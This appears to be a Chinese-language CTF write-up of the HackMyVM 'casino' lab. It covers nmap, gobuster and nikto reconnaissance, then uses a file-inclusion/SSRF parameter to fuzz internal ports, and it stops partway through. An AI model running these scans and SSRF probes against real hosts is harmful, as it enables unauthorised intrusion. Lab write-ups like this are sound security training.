{"id":436,"date":"2024-03-21T15:29:41","date_gmt":"2024-03-21T07:29:41","guid":{"rendered":"http:\/\/162.14.82.114\/?p=436"},"modified":"2024-03-21T21:19:35","modified_gmt":"2024-03-21T13:19:35","slug":"hmv-_-casino","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/436\/03\/21\/2024\/","title":{"rendered":"hmv[-_-]casino"},"content":{"rendered":"<h1>casino<\/h1>\n<p>\u5bfc\u5165<code>virtualbox<\/code>\uff0c\u518d\u6539\u4e3a1.0\u534f\u8bae\uff0c\u4f7f\u7528<code>vmware<\/code>\u6253\u5f00\uff0c\u5229\u7528<code>grub<\/code>\u4fee\u6539\u7f51\u5361\u914d\u7f6e\u6587\u4ef6\uff0c\u91cd\u542f\u7f51\u5361\uff0c\u7136\u540e\u5c31\u53ef\u4ee5\u626b\u5230\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527060.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527060.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321124020497\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\uff0c\u626b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527062.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527062.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321124049304\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u770b\u6837\u5b50\u6ca1\u9519\u4e86\uff0c\u5c31\u8fd9\u4e48\u5e72\u5427\u3002<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sT -T4 -sV  -p- 10.160.52.102<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n80\/tcp open  http    Apache httpd 2.4.57 ((Debian))\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/10.160.52.102 -f -t 50 -x php,txt,html,png,jpg<\/code><\/pre>\n<pre><code class=\"language-text\">\/.html\/               (Status: 403) [Size: 278]\n\/.php\/                (Status: 403) [Size: 278]\n\/register.php\/        (Status: 200) [Size: 1347]\n\/icons\/               (Status: 403) [Size: 278]\n\/index.php\/           (Status: 200) [Size: 1138]\n\/imgs\/                (Status: 200) [Size: 3914]\n\/js\/                  (Status: 200) [Size: 1120]\n\/logout.php\/          (Status: 302) [Size: 0] [--&gt; \/index.php]\n\/config.php\/          (Status: 200) [Size: 0]\n\/casino\/              (Status: 302) [Size: 0] [--&gt; ..\/index.php]\n\/styles\/              (Status: 200) [Size: 2330]\n\/restricted.php\/      (Status: 302) [Size: 0] [--&gt; ..\/index.php]\n\/.html\/               (Status: 403) [Size: 278]\n\/.php\/                (Status: 403) [Size: 278]\n\/server-status\/       (Status: 403) [Size: 278]<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u73a9\u6e38\u620f<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527063.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527063.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321124643825\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527064.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527064.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321124750984\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6ce8\u518c\u4e00\u4e0b\uff0c\u7136\u540e\u767b\u5f55\u8fdb\u6765\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527065.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527065.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321124848227\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u662f\u4e00\u4e2a\u6e38\u620f\uff0c\u770b\u4e00\u4e0b\u4ecb\u7ecd\uff1a<\/p>\n<pre><code class=\"language-text\">_________________________________\nWIN 10.000$ =&gt; WIN A TEDDY BEAR\n_________________________________\nIntructions\n- CUPS\nThe player tries to guess which of three cups hides a small ball. The cups are shuffled, and the player must select the correct one to win. The player wins or losess the same amount he bets.\n\n- GUN\nThe player presses the &quot;Shoot&quot; button. There is a 1\/6 chance of losing. In that case, the player&#039;s money is multiplied by 0.15. Otherwise, the player&#039;s money is multiplied by 1.5.\n\n- Dice\nThe player places a bet on whether the value of the sum of two dice will be less than, equal to or greater than 7.\n\n||====================================================================||\n||\/\/$\\\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\/$\\\\||\n||(100)==================| FEDERAL RESERVE NOTE |================(100)||\n||\\\\$\/\/        ~         &#039;------========--------&#039;                \\\\$\/\/||\n||&lt;&lt; \/        \/$\\              \/\/ ____ \\\\                         \\ &gt;&gt;||\n||&gt;&gt;|  12    \/\/L\\\\            \/\/ \/\/\/..) \\\\         L38036133B   12 |&lt;&lt;||\n||&lt;&lt;|        \\\\ \/\/           || &lt;||  &gt;\\  ||                        |&gt;&gt;||\n||&gt;&gt;|         \\$\/            ||  $$ --\/  ||        One Hundred     |&lt;&lt;||\n||&lt;&lt;|      L38036133B        *\\\\  |\\_\/  \/\/* series                 |&gt;&gt;||\n||&gt;&gt;|  12                     *\\\\\/___\\_\/\/*   1989                  |&lt;&lt;||\n||&lt;&lt;\\      Treasurer     ______\/Franklin\\________     Secretary 12 \/&gt;&gt;||\n||\/\/$\\                 ~|UNITED STATES OF AMERICA|~               \/$\\\\||\n||(100)===================  ONE HUNDRED DOLLARS =================(100)||\n||\\\\$\/\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\\$\/\/||\n||====================================================================||\n<\/code><\/pre>\n<ul>\n<li>\n<p>\u676f\u5b50\uff1a\u73a9\u5bb6\u8bd5\u7740\u731c\u731c\u4e09\u4e2a\u676f\u5b50\u4e2d\u7684\u54ea\u4e00\u4e2a\u85cf\u7740\u4e00\u4e2a\u5c0f\u7403\u3002\u5956\u676f\u662f\u6d17\u724c\u7684\uff0c\u73a9\u5bb6\u5fc5\u987b\u9009\u62e9\u6b63\u786e\u7684\u5956\u676f\u624d\u80fd\u83b7\u80dc\u3002<\/p>\n<\/li>\n<li>\n<p>\u67aa\uff1a\u73a9\u5bb6\u6309\u4e0b\u201c\u5c04\u51fb\u201d\u6309\u94ae\u3002\u8f93\u7684\u51e0\u7387\u662f\u516d\u5206\u4e4b\u4e00\u3002\u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u73a9\u5bb6\u7684\u94b1\u4e58\u4ee50.15\u3002\u5426\u5219\uff0c\u73a9\u5bb6\u7684\u94b1\u5c06\u4e58\u4ee51.5\u3002<\/p>\n<\/li>\n<li>\n<p>\u9ab0\u5b50\uff1a\u73a9\u5bb6\u5c31\u4e24\u4e2a\u9ab0\u5b50\u4e4b\u548c\u7684\u503c\u662f\u5426\u5c0f\u4e8e\u3001\u7b49\u4e8e\u6216\u5927\u4e8e7\u4e0b\u6ce8\u3002<\/p>\n<\/li>\n<\/ul>\n<p>\u968f\u4fbf\u73a9\u4e00\u4e0b\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527066.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527066.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321125804145\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u9009\u67aa\u8f7d<code>10000<\/code>\u4ee5\u4e0b\u4e0d\u4f1a\u5931\u8d25\uff0c\u5982\u679c\u8981\u8d85\u8fc7<code>10000<\/code>\u5c31\u4f1a\u5931\u8d25\uff1a<\/p>\n<p>\u62ff\u523010000\u4ee5\u540e\u8fd8\u662f\u6ca1\u5565\u4e1c\u897f\u3002\u3002\u3002\u3002\u884c\u5427\u3002<\/p>\n<p>\u626b\u4e00\u4e0b\u5e38\u89c1\u7684\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">nikto -h http:\/\/10.160.52.102<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          10.160.52.102\n+ Target Hostname:    10.160.52.102\n+ Target Port:        80\n+ Start Time:         2024-03-21 01:00:21 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.57 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/: Cookie PHPSESSID created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/database.sql: Potentially interesting backup\/cert file found. . See: https:\/\/cwe.mitre.org\/data\/definitions\/530.html\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/config.php: PHP Config file may contain database IDs and passwords.\n+ \/imgs\/: Directory indexing found.\n+ \/imgs\/: This might be interesting.\n+ \/database.sql: Database SQL found.\n+ \/styles\/: Directory indexing found.\n+ 8101 requests: 0 error(s) and 10 item(s) reported on remote host\n+ End Time:           2024-03-21 01:00:38 (GMT-4) (17 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<p>\u7a81\u7136\u60f3\u5230\u4e00\u4e2a\u95ee\u9898\uff0c\u5047\u5982\u94b1\u53d8\u62100\u4e86\u4f1a\u548b\u6837\uff0c\u90a3\u6837\u7684\u8bdd\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527067.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527067.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321130932642\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\uff0c\u8fd9\u6837\u5c31\u73a9\u4e0d\u4e86\u4e86\uff0c\u91cd\u65b0\u518d\u521b\u4e00\u4e2a\u53f7\u5427\uff0c\u518d\u8bd5\u8bd5\uff1a<\/p>\n<p>\u6211\u53c8\u4e00\u6b21\u6545\u610f\u641e\u5230<code>0<\/code>\uff0c\u53d1\u73b0\u7f51\u5740\u53d8\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=en.wikipedia.org\/wiki\/Dice<\/code><\/pre>\n<p>\u4f3c\u4e4e\u5b58\u5728<code>RFI<\/code>\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527068.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527068.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321132203859\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\uff0c\u8bf4\u660e\u662f\u53ef\u4ee5\u6b63\u5e38\u8fdc\u7a0b\u8bfb\u53d6\u6587\u4ef6\u7684\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527069.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527069.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321133111447\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u4e5f\u4e0d\u884c\uff0c\u8ba9\u4ed6\u5305\u542b\u672c\u5730\u6587\u4ef6\u8bd5\u8bd5\uff1f<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527070.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527070.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321133315193\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>FUZZ \u7aef\u53e3<\/h3>\n<p>\u8bf4\u660e\u662f\u53ef\u4ee5\u67e5\u5230\u672c\u5730\u6587\u4ef6\u7684\uff0c\u5c1d\u8bd5\u8ba9\u4ed6\u8f93\u51fa\u672c\u5730\u7684\u7aef\u53e3\u8bd5\u8bd5\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527071.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527071.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321134122400\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">seq 0 65535 &gt; 65535.txt\ngobuster fuzz -u &quot;http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:FUZZ&quot; -w 65535.txt -c &quot;PHPSESSID=olis0nc010av7pg4shf5rutt0i&quot; -a &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527072.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527072.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321134521014\" \/><\/div><\/p>\n<p>\u5c06\u6700\u591a\u7684\u8fc7\u6ee4\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">gobuster fuzz -u &quot;http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:FUZZ&quot; -w 65535.txt -c &quot;PHPSESSID=olis0nc010av7pg4shf5rutt0i&quot; -a &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot; --exclude-length &quot;1130&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527073.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527073.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321134737142\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">Found: [Status=200] [Length=2268] [Word=0] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:0\nFound: [Status=200] [Length=2268] [Word=80] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:80\nFound: [Status=200] [Length=1969] [Word=6969] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969<\/code><\/pre>\n<p>\u8bbf\u95ee\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527074.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527074.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321134900291\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7ffb\u8bd1\u8f6f\u4ef6\u7ffb\u8bd1\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-text\">\u6dfb\u52a0\u66f4\u591a\u6e38\u620f\u3002\n\u522b\u5fd8\u4e86\u4e8c\u8fdb\u5236\u6587\u4ef6\u7684\u5bc6\u7801\u3002\n\u8d2d\u4e70\u57df\u540d\u3002\n\u8ba9\u6e38\u620f\u53d8\u5f97\u66f4\u96be\u3002\n\u5b89\u5168\u7684FTP\u670d\u52a1\u5668\u3002\n\u4fb5\u5165\u8054\u90a6\u8c03\u67e5\u5c40\u3002\n\u4e70\u4e00\u4e2a\u661f\u671f\u4e09\u5403\u7684\u4e09\u660e\u6cbb\u3002\n\u4e86\u89e3\u7b26\u53f7\u6267\u884c\u3002\n\u5f00\u53d1WannaCry 4.0\u3002\n\u5e2e\u52a9Colors\u9ed1\u5ba2\u7ec4\u7ec7\u6062\u590d\u4ed6\u4eec\u7684\u670d\u52a1\u5668\u5e76\u4f7f\u5176\u66f4\u5b89\u5168\u3002<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u7aef\u53e3\u4e0b\u6709\u65e0\u76f8\u5173\u7684\u4fe1\u606f<\/p>\n<pre><code class=\"language-bash\">gobuster fuzz -u &quot;http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/FUZZ&quot; -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -c &quot;PHPSESSID=olis0nc010av7pg4shf5rutt0i&quot; -a &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527075.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527075.png\" 